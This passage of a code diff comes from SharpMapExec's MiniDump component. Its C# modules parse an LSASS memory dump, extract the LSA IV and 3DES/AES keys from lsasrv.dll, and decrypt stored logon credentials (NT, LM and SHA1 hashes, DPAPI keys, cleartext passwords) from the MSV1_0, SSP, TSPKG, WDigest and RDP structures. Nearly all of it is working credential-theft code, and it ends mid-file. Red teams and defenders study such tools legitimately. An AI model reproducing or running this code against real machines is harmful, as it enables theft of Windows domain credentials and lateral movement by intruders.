219	+	minidump.fileBinaryReader.BaseStream.Seek(listentry + template.DomainOffset, 0);
220	+	logonsession.LogonDomain =
221	+	ExtractUnicodeStringString(minidump,
222	+	ExtractUnicodeString(minidump.fileBinaryReader));
223	+
224	+	minidump.fileBinaryReader.BaseStream.Seek(listentry + template.LogonServerOffset, 0);
225	+	logonsession.LogonServer =
226	+	ExtractUnicodeStringString(minidump,
227	+	ExtractUnicodeString(minidump.fileBinaryReader));
228	+
229	+	string stringSid = "";
230	+	stringSid = ExtractSid(minidump, logonsession.pSid);
231	+
232	+	var logon = new Logon(luid)
233	+	{
234	+	Session = logonsession.Session,
235	+	LogonType = KUHL_M_SEKURLSA_LOGON_TYPE[logonsession.LogonType],
236	+	LogonTime = logonsession.LogonTime,
237	+	UserName = logonsession.UserName,
238	+	LogonDomain = logonsession.LogonDomain,
239	+	LogonServer = logonsession.LogonServer,
240	+	SID = stringSid,
241	+	pCredentials = Rva2offset(minidump, logonsession.pCredentials),
242	+	pCredentialManager = Rva2offset(minidump, logonsession.pCredentialManager)
243	+	};
244	+	//Console.WriteLine("session " + logon.Session + " luid " + logon.LogonId.LowPart + " username " + logon.UserName + " pCredentials " + logonsession.pCredentials);
245	+	//PrintProperties(logon);
246	+	logonlist.Add(logon);
247	+
248	+	voffset = ReadInt64(minidump.fileBinaryReader, listentry);
249	+	current = Rva2offset(minidump, voffset);
250	+	} while (true);
251	+	}
252	+
253	+	return logonlist;
254	+	}
255	+
256	+	[StructLayout(LayoutKind.Sequential)]
257	+	public struct KIWI_BASIC_SECURITY_LOGON_SESSION_DATA
258	+	{
259	+	public long LogonId;
260	+	public string UserName;
261	+	public string LogonDomain;
262	+	public int LogonType;
263	+	public int Session;
264	+	public long pCredentials;
265	+	public long pSid;
266	+	public long pCredentialManager;
267	+	public FILETIME LogonTime;
268	+	public string LogonServer;
269	+	}
270	+	}
271	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Msv1_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Linq;
5	+	using System.Runtime.InteropServices;
6	+	using System.Text;
7	+	using static Minidump.Helpers;
8	+
9	+	namespace Minidump.Decryptor
10	+	{
11	+	public class Msv1_
12	+	{
13	+	public const int LM_NTLM_HASH_LENGTH = 16;
14	+	public const int SHA_DIGEST_LENGTH = 20;
15	+
16	+	public static int FindCredentials(Program.MiniDump minidump, msv.MsvTemplate template)
17	+	{
18	+	//PrintProperties(template);
19	+
20	+	foreach (var logon in minidump.logonlist)
21	+	{
22	+	var lsasscred = logon.pCredentials;
23	+	var luid = logon.LogonId;
24	+
25	+	if (lsasscred > 0)
26	+	{
27	+	var msventry = new Msv();
28	+
29	+	KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
30	+
31	+	while (lsasscred != 0)
32	+	{
33	+	minidump.fileBinaryReader.BaseStream.Seek(lsasscred, 0);
34	+	byte[] credentialsBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_MSV1_0_CREDENTIALS)));
35	+
36	+	if (credentialsBytes.Length <= 0)
37	+	break;
38	+
39	+	var pPrimaryCredentials = BitConverter.ToInt64(credentialsBytes, FieldOffset<KIWI_MSV1_0_CREDENTIALS>("PrimaryCredentials"));
40	+	var pNext = BitConverter.ToInt64(credentialsBytes, FieldOffset<KIWI_MSV1_0_CREDENTIALS>("next"));
41	+
42	+	lsasscred = Rva2offset(minidump, pPrimaryCredentials);
43	+	while (lsasscred != 0)
44	+	{
45	+	minidump.fileBinaryReader.BaseStream.Seek(lsasscred, 0);
46	+	byte[] primaryCredentialsBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)));
47	+
48	+	primaryCredentials = ReadStruct<KIWI_MSV1_0_PRIMARY_CREDENTIALS>(primaryCredentialsBytes);
49	+	primaryCredentials.Credentials = ExtractUnicodeString(minidump.fileBinaryReader, lsasscred + template.MSV1CredentialsOffset);
50	+	primaryCredentials.Primary = ExtractUnicodeString(minidump.fileBinaryReader, lsasscred + template.MSV1PrimaryOffset);
51	+
52	+	if (ExtractANSIStringString(minidump, primaryCredentials.Primary).Equals("Primary"))
53	+	{
54	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, primaryCredentials.Credentials.Buffer), 0);
55	+	byte[] msvCredentialsBytes = minidump.fileBinaryReader.ReadBytes(primaryCredentials.Credentials.MaximumLength);
56	+
57	+	var msvDecryptedCredentialsBytes = BCrypt.DecryptCredentials(msvCredentialsBytes, minidump.lsakeys);
58	+
59	+	var usLogonDomainName = ReadStruct<UNICODE_STRING>(GetBytes(msvDecryptedCredentialsBytes, template.LogonDomainNameOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
60	+	var usUserName = ReadStruct<UNICODE_STRING>(GetBytes(msvDecryptedCredentialsBytes, template.UserNameOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
61	+
62	+	msventry = new Msv();
63	+	msventry.DomainName = Encoding.Unicode.GetString(GetBytes(msvDecryptedCredentialsBytes, usLogonDomainName.Buffer, usLogonDomainName.Length));
64	+	msventry.UserName = " " + Encoding.Unicode.GetString(GetBytes(msvDecryptedCredentialsBytes, usUserName.Buffer, usUserName.Length));
65	+
66	+	string lmhash = PrintHashBytes(GetBytes(msvDecryptedCredentialsBytes, template.LmOwfPasswordOffset, LM_NTLM_HASH_LENGTH));
67	+	if (lmhash != "00000000000000000000000000000000")
68	+	msventry.Lm = " " + lmhash;
69	+	msventry.NT = " " + PrintHashBytes(GetBytes(msvDecryptedCredentialsBytes, template.NtOwfPasswordOffset, LM_NTLM_HASH_LENGTH));
70	+	msventry.Sha1 = " " + PrintHashBytes(GetBytes(msvDecryptedCredentialsBytes, template.ShaOwPasswordOffset, SHA_DIGEST_LENGTH));
71	+	string dpapi = PrintHashBytes(GetBytes(msvDecryptedCredentialsBytes, template.DPAPIProtectedOffset, LM_NTLM_HASH_LENGTH));
72	+	if (dpapi != "00000000000000000000000000000000" && dpapi != "0c000e00000000005800000000000000")
73	+	msventry.Dpapi = " " + dpapi;
74	+
75	+	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
76	+	if (currentlogon == null)
77	+	Console.WriteLine("[x] Something goes wrong");
78	+	else
79	+	currentlogon.Msv = msventry;
80	+	}
81	+
82	+	lsasscred = primaryCredentials.next;
83	+	}
84	+
85	+	lsasscred = pNext;
86	+	}
87	+	}
88	+	}
89	+
90	+	return 0;
91	+	}
92	+	}
93	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Rdp_.cs

1	+	using Minidump.Streams;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Runtime.InteropServices;
7	+	using System.Text;
8	+	using static Minidump.Helpers;
9	+
10	+	namespace Minidump.Decryptor
11	+	{
12	+	public class Rdp_
13	+	{
14	+	public static int FindCredentials(Program.MiniDump minidump, rdp.RdpTemplate template)
15	+	{
16	+	foreach (byte[] signature in template.signature)
17	+	{
18	+	rdp.WTS_KIWI cred = new rdp.WTS_KIWI();
19	+
20	+	List<long> positions = find_all_global(minidump.fileBinaryReader, signature);
21	+	foreach (long pos in positions)
22	+	{
23	+	if (pos <= 0)
24	+	continue;
25	+
26	+	minidump.fileBinaryReader.BaseStream.Seek(pos + template.first_entry_offset, 0);
27	+	try
28	+	{
29	+	byte[] credBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(rdp.WTS_KIWI)));
30	+	cred = ReadStruct<rdp.WTS_KIWI>(credBytes);
31	+	}
32	+	catch
33	+	{
34	+	continue;
35	+	}
36	+
37	+	if (cred.cbDomain <= 512 && cred.cbUsername <= 512 && cred.cbPassword <= 512 && cred.cbPassword > 0)
38	+	{
39	+	try
40	+	{
41	+	string domain = Encoding.ASCII.GetString(cred.Domain.Take(cred.cbDomain).ToArray());
42	+	string username = Encoding.ASCII.GetString(cred.UserName.Take(cred.cbUsername).ToArray());
43	+	byte[] password_raw = cred.Password.Take(cred.cbPassword).ToArray();
44	+
45	+	if (string.IsNullOrEmpty(domain) \|\| string.IsNullOrEmpty(username))
46	+	continue;
47	+
48	+	//credentials are encrypted
49	+	if (minidump.sysinfo.BuildNumber >= (int)SystemInfo.WindowsMinBuild.WIN_10)
50	+	continue;
51	+
52	+	Console.WriteLine(username);
53	+	Console.WriteLine(domain);
54	+	Console.WriteLine(PrintHexBytes(password_raw));
55	+
56	+	PrintProperties(cred);
57	+	}
58	+	catch { }
59	+	}
60	+	}
61	+	}
62	+
63	+	return 0;
64	+	}
65	+	}
66	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Ssp_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System.Collections.Generic;
4	+	using System.Linq;
5	+	using System.Runtime.InteropServices;
6	+	using System.Security.Cryptography;
7	+	using System.Text;
8	+	using static Minidump.Helpers;
9	+
10	+	namespace Minidump.Decryptor
11	+	{
12	+	internal class Ssp_
13	+	{
14	+	public static int FindCredentials(Program.MiniDump minidump, ssp.SspTemplate template)
15	+	{
16	+	ssp.KIWI_SSP_CREDENTIAL_LIST_ENTRY entry;
17	+	string passDecrypted = "";
18	+	long llCurrent;
19	+	long sspCredentialListAddr;
20	+
21	+	long position = find_signature(minidump, "msv1_0.dll", template.signature);
22	+	if (position == 0)
23	+	return 0;
24	+
25	+	var ptr_entry_loc = (long)get_ptr_with_offset(minidump.fileBinaryReader, (position + template.first_entry_offset), minidump.sysinfo);
26	+	sspCredentialListAddr = ReadInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
27	+
28	+	llCurrent = sspCredentialListAddr;
29	+
30	+	do
31	+	{
32	+	llCurrent = Rva2offset(minidump, llCurrent);
33	+	minidump.fileBinaryReader.BaseStream.Seek(llCurrent, 0);
34	+
35	+	byte[] entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(ssp.KIWI_SSP_CREDENTIAL_LIST_ENTRY)));
36	+	entry = ReadStruct<ssp.KIWI_SSP_CREDENTIAL_LIST_ENTRY>(entryBytes);
37	+
38	+	string username = ExtractUnicodeStringString(minidump, entry.credentials.UserName);
39	+	string domain = ExtractUnicodeStringString(minidump, entry.credentials.Domain);
40	+	int reference = (int)entry.References;
41	+
42	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, entry.credentials.Password.Buffer), 0);
43	+	byte[] msvPasswordBytes = minidump.fileBinaryReader.ReadBytes(entry.credentials.Password.MaximumLength);
44	+	byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, minidump.lsakeys);
45	+
46	+	passDecrypted = Encoding.Unicode.GetString(msvDecryptedPasswordBytes);
47	+
48	+	if (!string.IsNullOrEmpty(username) && username.Length > 1 && msvDecryptedPasswordBytes.Length > 1)
49	+	{
50	+	LUID luid = entry.LogonId;
51	+
52	+	Ssp sspentry = new Ssp();
53	+	//sspentry.Reference = reference;
54	+	sspentry.UserName = username;
55	+
56	+	if (!string.IsNullOrEmpty(domain))
57	+	{
58	+	sspentry.DomainName = domain;
59	+	}
60	+	else
61	+	{
62	+	sspentry.DomainName = "NULL";
63	+	}
64	+
65	+	if (!string.IsNullOrEmpty(passDecrypted))
66	+	{
67	+	sspentry.Password = passDecrypted;
68	+	}
69	+	else
70	+	{
71	+	sspentry.Password = "NULL";
72	+	}
73	+
74	+	try
75	+	{
76	+	sspentry.NT = msvDecryptedPasswordBytes.MD4().AsHexString();
77	+	}
78	+	catch
79	+	{
80	+	sspentry.NT = "NULL";
81	+	}
82	+
83	+	if (sspentry.Password != "NULL")
84	+	{
85	+	Logon currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
86	+	if (currentlogon == null)
87	+	{
88	+	currentlogon = new Logon(luid);
89	+	currentlogon.UserName = username;
90	+	currentlogon.Ssp = new List<Ssp>();
91	+	currentlogon.Ssp.Add(sspentry);
92	+	minidump.logonlist.Add(currentlogon);
93	+	}
94	+	else
95	+	{
96	+	if (currentlogon.Ssp == null)
97	+	currentlogon.Ssp = new List<Ssp>();
98	+
99	+	currentlogon.Ssp.Add(sspentry);
100	+	}
101	+	}
102	+	}
103	+
104	+	llCurrent = entry.Flink;
105	+	} while (llCurrent != sspCredentialListAddr);
106	+
107	+	return 0;
108	+	}
109	+	}
110	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Tspkg_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Runtime.InteropServices;
7	+	using System.Security.Cryptography;
8	+	using System.Text;
9	+	using static Minidump.Helpers;
10	+
11	+	namespace Minidump.Decryptor
12	+	{
13	+	public class Tspkg_
14	+	{
15	+	private static readonly long max_search_size = 170000;
16	+
17	+	public static int FindCredentials(Program.MiniDump minidump, tspkg.TspkgTemplate template)
18	+	{
19	+	RTL_AVL_TABLE entry;
20	+	long llCurrent;
21	+
22	+	long tsGlobalCredTableAddr = find_signature(minidump, "TSpkg.dll", template.signature);
23	+
24	+	if (tsGlobalCredTableAddr != 0)
25	+	{
26	+	long ptr_entry_loc = (long)get_ptr_with_offset(minidump.fileBinaryReader, tsGlobalCredTableAddr + template.avl_offset, minidump.sysinfo);
27	+	long ptr_entry = (long)Minidump.Helpers.ReadUInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
28	+	//ptr_entry = Rva2offset(minidump, ptr_entry);
29	+	//minidump.fileBinaryReader.BaseStream.Seek(ptr_entry, 0);
30	+	//byte[] entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(RTL_AVL_TABLE)));
31	+	//entry = ReadStruct<RTL_AVL_TABLE>(entryBytes);
32	+	//
33	+	//llCurrent = entry.BalancedRoot.RightChild;
34	+
35	+	WalkAVLTables(minidump, template, ptr_entry);
36	+
37	+	return 0;
38	+	}
39	+
40	+	return 1;
41	+	}
42	+
43	+	private static void WalkAVLTables(Program.MiniDump minidump, tspkg.TspkgTemplate template, long pElement)
44	+	{
45	+	pElement = Rva2offset(minidump, pElement);
46	+	minidump.fileBinaryReader.BaseStream.Seek(pElement, 0);
47	+
48	+	if (pElement == 0)
49	+	return;
50	+
51	+	var entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(RTL_AVL_TABLE)));
52	+	var entry = ReadStruct<RTL_AVL_TABLE>(entryBytes);
53	+
54	+	//Minidump.Helpers.PrintProperties(entry.BalancedRoot);
55	+
56	+	if (entry.OrderedPointer != 0)
57	+	{
58	+	pElement = Rva2offset(minidump, entry.OrderedPointer);
59	+	minidump.fileBinaryReader.BaseStream.Seek(pElement, 0);
60	+
61	+	var krbrLogonSessionBytes = minidump.fileBinaryReader.ReadBytes(template.TSCredTypeSize);
62	+	var luid = ReadStruct<LUID>(GetBytes(krbrLogonSessionBytes, template.TSCredLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID))));
63	+
64	+	long pCredAddr = Rva2offset(minidump, BitConverter.ToInt64(krbrLogonSessionBytes, template.TSCredOffset));
65	+	minidump.fileBinaryReader.BaseStream.Seek(pCredAddr, 0);
66	+
67	+	var pCredBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_TS_PRIMARY_CREDENTIAL)));
68	+	var pCred = ReadStruct<KIWI_TS_PRIMARY_CREDENTIAL>(pCredBytes);
69	+
70	+	var usUserName = pCred.credentials.UserName;
71	+	var usDomain = pCred.credentials.Domain;
72	+	var usPassword = pCred.credentials.Password;
73	+
74	+	var username = ExtractUnicodeStringString(minidump, usUserName);
75	+	var domain = ExtractUnicodeStringString(minidump, usDomain);
76	+
77	+	byte[] msvPasswordBytes = minidump.fileBinaryReader.ReadBytes(usPassword.MaximumLength);
78	+	var msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, minidump.lsakeys);
79	+
80	+	var passDecrypted = "";
81	+	var NT = "";
82	+	var encoder = new UnicodeEncoding(false, false, true);
83	+	try
84	+	{
85	+	passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
86	+	}
87	+	catch (Exception)
88	+	{
89	+	passDecrypted = PrintHexBytes(msvDecryptedPasswordBytes);
90	+	}
91	+
92	+	if (msvDecryptedPasswordBytes.Length > 0)
93	+	{
94	+	try
95	+	{
96	+	NT = msvDecryptedPasswordBytes.MD4().AsHexString();
97	+	}
98	+	catch
99	+	{
100	+	NT = "NULL";
101	+	}
102	+	}
103	+
104	+	if (!string.IsNullOrEmpty(username) && username.Length > 1)
105	+	{
106	+	Tspkg krbrentry = new Tspkg();
107	+	krbrentry.UserName = username;
108	+
109	+	if (!string.IsNullOrEmpty(domain))
110	+	krbrentry.DomainName = domain;
111	+	else
112	+	krbrentry.DomainName = "NULL";
113	+
114	+	if (!string.IsNullOrEmpty(passDecrypted))
115	+	krbrentry.Password = passDecrypted;
116	+	else
117	+	krbrentry.Password = "NULL";
118	+
119	+	krbrentry.NT = NT;
120	+
121	+	//Minidump.Helpers.PrintProperties(krbrentry);
122	+	if (krbrentry.Password != "NULL")
123	+	{
124	+	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
125	+	if (currentlogon == null)
126	+	{
127	+	currentlogon = new Logon(luid);
128	+	currentlogon.UserName = username;
129	+	currentlogon.Tspkg = new List<Tspkg>();
130	+	currentlogon.Tspkg.Add(krbrentry);
131	+	minidump.logonlist.Add(currentlogon);
132	+	}
133	+	else
134	+	{
135	+	currentlogon.Tspkg = new List<Tspkg>();
136	+	currentlogon.Tspkg.Add(krbrentry);
137	+	}
138	+	}
139	+	}
140	+	}
141	+
142	+	if (entry.BalancedRoot.RightChild != 0)
143	+	WalkAVLTables(minidump, template, entry.BalancedRoot.RightChild);
144	+	if (entry.BalancedRoot.LeftChild != 0)
145	+	WalkAVLTables(minidump, template, entry.BalancedRoot.LeftChild);
146	+	}
147	+	}
148	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/WDigest_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Runtime.InteropServices;
7	+	using System.Security.Cryptography;
8	+	using System.Text;
9	+	using static Minidump.Helpers;
10	+
11	+	namespace Minidump.Decryptor
12	+	{
13	+	internal class WDigest_
14	+	{
15	+	public static int FindCredentials(Program.MiniDump minidump, wdigest.WdigestTemplate template)
16	+	{
17	+	wdigest.KIWI_WDIGEST_LIST_ENTRY entry;
18	+	long logSessListAddr;
19	+	long llCurrent;
20	+	var passDecrypted = "";
21	+
22	+	long position = find_signature(minidump, "wdigest.dll", template.signature);
23	+	if (position == 0)
24	+	return 0;
25	+
26	+	var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader, (position + template.first_entry_offset), minidump.sysinfo);
27	+	var ptr_entry = ReadUInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
28	+	logSessListAddr = Rva2offset(minidump, (long)ptr_entry);
29	+
30	+	minidump.fileBinaryReader.BaseStream.Seek(logSessListAddr, 0);
31	+	byte[] entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(wdigest.KIWI_WDIGEST_LIST_ENTRY)));
32	+
33	+	var pThis = BitConverter.ToInt64(entryBytes, FieldOffset<wdigest.KIWI_WDIGEST_LIST_ENTRY>("This"));
34	+	llCurrent = pThis;
35	+
36	+	do
37	+	{
38	+	llCurrent = Rva2offset(minidump, llCurrent);
39	+	minidump.fileBinaryReader.BaseStream.Seek(llCurrent, 0);
40	+	entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(wdigest.KIWI_WDIGEST_LIST_ENTRY)));
41	+	entry = ReadStruct<wdigest.KIWI_WDIGEST_LIST_ENTRY>(entryBytes);
42	+
43	+	if (entry.UsageCount == 1)
44	+	{
45	+	minidump.fileBinaryReader.BaseStream.Seek(llCurrent + template.USERNAME_OFFSET, 0);
46	+	var username = ExtractUnicodeStringString(minidump, ExtractUnicodeString(minidump.fileBinaryReader));
47	+	minidump.fileBinaryReader.BaseStream.Seek(llCurrent + template.HOSTNAME_OFFSET, 0);
48	+	var hostname = ExtractUnicodeStringString(minidump, ExtractUnicodeString(minidump.fileBinaryReader));
49	+	minidump.fileBinaryReader.BaseStream.Seek(llCurrent + template.PASSWORD_OFFSET, 0);
50	+	var password = ExtractUnicodeStringString(minidump, ExtractUnicodeString(minidump.fileBinaryReader));
51	+
52	+	if (!string.IsNullOrEmpty(username) && username.Length > 1)
53	+	{
54	+	var luid = entry.LocallyUniqueIdentifier;
55	+
56	+	var wdigestentry = new WDigest();
57	+	wdigestentry.UserName = username;
58	+
59	+	if (!string.IsNullOrEmpty(hostname))
60	+	wdigestentry.HostName = hostname;
61	+	else
62	+	wdigestentry.HostName = "NULL";
63	+
64	+	byte[] passDecryptedBytes = new byte[] { };
65	+	if (!string.IsNullOrEmpty(password) && password.Length % 2 == 0)
66	+	{
67	+	passDecryptedBytes = BCrypt.DecryptCredentials(Encoding.Unicode.GetBytes(password), minidump.lsakeys);
68	+	passDecrypted = Encoding.Unicode.GetString(passDecryptedBytes);
69	+	if (passDecrypted.Length > 0)
70	+	wdigestentry.Password = passDecrypted;
71	+	}
72	+	else
73	+	{
74	+	wdigestentry.Password = "NULL";
75	+	}
76	+
77	+	if (passDecryptedBytes.Length > 0)
78	+	{
79	+	try
80	+	{
81	+	wdigestentry.NT = passDecryptedBytes.MD4().AsHexString();
82	+	}
83	+	catch
84	+	{
85	+	wdigestentry.NT = "NULL";
86	+	}
87	+	}
88	+
89	+	if (wdigestentry.Password != "NULL")
90	+	{
91	+	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
92	+	if (currentlogon == null)
93	+	{
94	+	currentlogon = new Logon(luid)
95	+	{
96	+	UserName = username,
97	+	Wdigest = new List<WDigest>()
98	+	};
99	+	currentlogon.Wdigest.Add(wdigestentry);
100	+	minidump.logonlist.Add(currentlogon);
101	+	}
102	+	else
103	+	{
104	+	currentlogon.Wdigest = new List<WDigest>();
105	+	currentlogon.Wdigest.Add(wdigestentry);
106	+	}
107	+	}
108	+	}
109	+	}
110	+
111	+	llCurrent = entry.Flink;
112	+	} while (llCurrent != (long)ptr_entry);
113	+
114	+	return 0;
115	+	}
116	+	}
117	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/lsadecryptor_lsa_decryptor.cs

1	+	using Minidump.Templates;
2	+	using System;
3	+
4	+	namespace Minidump.Decryptor
5	+	{
6	+	public class LsaDecryptor
7	+	{
8	+	public struct LsaKeys
9	+	{
10	+	public byte[] iv;
11	+	public byte[] aes_key;
12	+	public byte[] des_key;
13	+	}
14	+
15	+	public static LsaKeys choose(Program.MiniDump minidump, object template)
16	+	{
17	+	if (template.GetType() == typeof(lsaTemplate_NT6.LsaTemplate_NT6))
18	+	{
19	+	return LsaDecryptor_NT6.LsaDecryptor(minidump, (lsaTemplate_NT6.LsaTemplate_NT6)template);
20	+	}
21	+	else
22	+	{
23	+	throw new Exception($"NT5 not yet supported");
24	+	}
25	+	}
26	+	}
27	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/lsadecryptor_lsa_decryptor_nt6.cs

1	+	using Minidump.Templates;
2	+	using System;
3	+	using System.Linq;
4	+	using System.Runtime.InteropServices;
5	+
6	+	namespace Minidump.Decryptor
7	+	{
8	+	public class LsaDecryptor_NT6
9	+	{
10	+	public static LsaDecryptor.LsaKeys LsaDecryptor(Program.MiniDump minidump, lsaTemplate_NT6.LsaTemplate_NT6 template)
11	+	{
12	+	LsaDecryptor.LsaKeys LsaKeys = new LsaDecryptor.LsaKeys();
13	+
14	+	acquire_crypto_material(minidump, template, ref LsaKeys);
15	+
16	+	return LsaKeys;
17	+	}
18	+
19	+	public static void acquire_crypto_material(Program.MiniDump minidump, lsaTemplate_NT6.LsaTemplate_NT6 template, ref LsaDecryptor.LsaKeys LsaKeys)
20	+	{
21	+	//Console.WriteLine("Acquireing crypto stuff...");
22	+
23	+	long sigpos = find_signature(minidump, template);
24	+	minidump.fileBinaryReader.BaseStream.Seek(sigpos, 0);
25	+
26	+	LsaKeys.iv = get_IV(minidump, sigpos, template);
27	+	LsaKeys.des_key = get_des_key(minidump, sigpos, template);
28	+	LsaKeys.aes_key = get_aes_key(minidump, sigpos, template);
29	+	}
30	+
31	+	public static byte[] get_des_key(Program.MiniDump minidump, long pos, lsaTemplate_NT6.LsaTemplate_NT6 template)
32	+	{
33	+	///Console.WriteLine("Acquireing DES key...");
34	+	long offset = (pos + template.key_pattern.offset_to_DES_key_ptr);
35	+	long ptr_iv = (long)Helpers.get_ptr_with_offset(minidump.fileBinaryReader, (long)offset, minidump.sysinfo);
36	+
37	+	minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
38	+	ptr_iv = (long)Minidump.Helpers.ReadUInt64(minidump.fileBinaryReader);
39	+
40	+	ptr_iv = Helpers.Rva2offset(minidump, ptr_iv);
41	+
42	+	minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
43	+
44	+	byte[] h3DesKeyBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)));
45	+	KIWI_BCRYPT_HANDLE_KEY h3DesKey = Helpers.ReadStruct<KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);
46	+
47	+	byte[] extracted3DesKeyByte = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)));
48	+	KIWI_BCRYPT_KEY81 extracted3DesKey = Helpers.ReadStruct<KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);
49	+
50	+	return extracted3DesKey.hardkey.data.Take(24).ToArray();
51	+	}
52	+
53	+	public static byte[] get_aes_key(Program.MiniDump minidump, long pos, lsaTemplate_NT6.LsaTemplate_NT6 template)
54	+	{
55	+	//Console.WriteLine("Acquireing AES key...");
56	+	long offset = (pos + template.key_pattern.offset_to_AES_key_ptr);
57	+	long ptr_iv = (long)Helpers.get_ptr_with_offset(minidump.fileBinaryReader, (long)offset, minidump.sysinfo);
58	+
59	+	minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
60	+	ptr_iv = (long)Helpers.ReadUInt64(minidump.fileBinaryReader);
61	+	ptr_iv = Helpers.Rva2offset(minidump, ptr_iv);
62	+
63	+	minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
64	+
65	+	byte[] hAesKeyBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)));
66	+	KIWI_BCRYPT_HANDLE_KEY hAesKey = Helpers.ReadStruct<KIWI_BCRYPT_HANDLE_KEY>(hAesKeyBytes);
67	+
68	+	ptr_iv = Helpers.Rva2offset(minidump, hAesKey.key);
69	+	minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
70	+	byte[] extractedAesKeyBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)));
71	+	KIWI_BCRYPT_KEY81 extractedAesKey = Helpers.ReadStruct<KIWI_BCRYPT_KEY81>(extractedAesKeyBytes);
72	+
73	+	return extractedAesKey.hardkey.data.Take(16).ToArray();
74	+	}
75	+
76	+	public static long find_signature(Program.MiniDump minidump, lsaTemplate_NT6.LsaTemplate_NT6 template)
77	+	{
78	+	//Console.WriteLine("Looking for main struct signature in memory...");
79	+	long fl = Helpers.find_in_module(minidump, "lsasrv.dll", template.key_pattern.signature);
80	+	if (fl == 0)
81	+	{
82	+	throw new Exception("LSA signature not found!");
83	+	}
84	+	return fl;
85	+	}
86	+
87	+	public static byte[] get_IV(Program.MiniDump minidump, long pos, lsaTemplate_NT6.LsaTemplate_NT6 template)
88	+	{
89	+	//Console.WriteLine("Reading IV");
90	+	long offset = (pos + template.key_pattern.offset_to_IV_ptr);
91	+
92	+	long ptr_iv = (long)Helpers.get_ptr_with_offset(minidump.fileBinaryReader, (long)offset, minidump.sysinfo);
93	+
94	+	minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
95	+	byte[] data = minidump.fileBinaryReader.ReadBytes(template.key_pattern.IV_length);
96	+
97	+	return data.Take(16).ToArray();
98	+	}
99	+	}
100	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Helpers.cs

1	+	using Minidump.Streams;
2	+	using System;
3	+	using System.Collections.Generic;
4	+	using System.Globalization;
5	+	using System.IO;
6	+	using System.Linq;
7	+	using System.Runtime.InteropServices;
8	+	using System.Text;
9	+
10	+	namespace Minidump
11	+	{
12	+	public class Helpers
13	+	{
14	+	public const int LM_NTLM_HASH_LENGTH = 16;
15	+	public const int SHA_DIGEST_LENGTH = 20;
16	+
17	+	[StructLayout(LayoutKind.Sequential)]
18	+	public struct LARGE_INTEGER
19	+	{
20	+	public int LowPart;
21	+	public int HighPart;
22	+	}
23	+
24	+	[StructLayout(LayoutKind.Sequential)]
25	+	public struct UNICODE_STRING
26	+	{
27	+	public ushort Length;
28	+	public ushort MaximumLength;
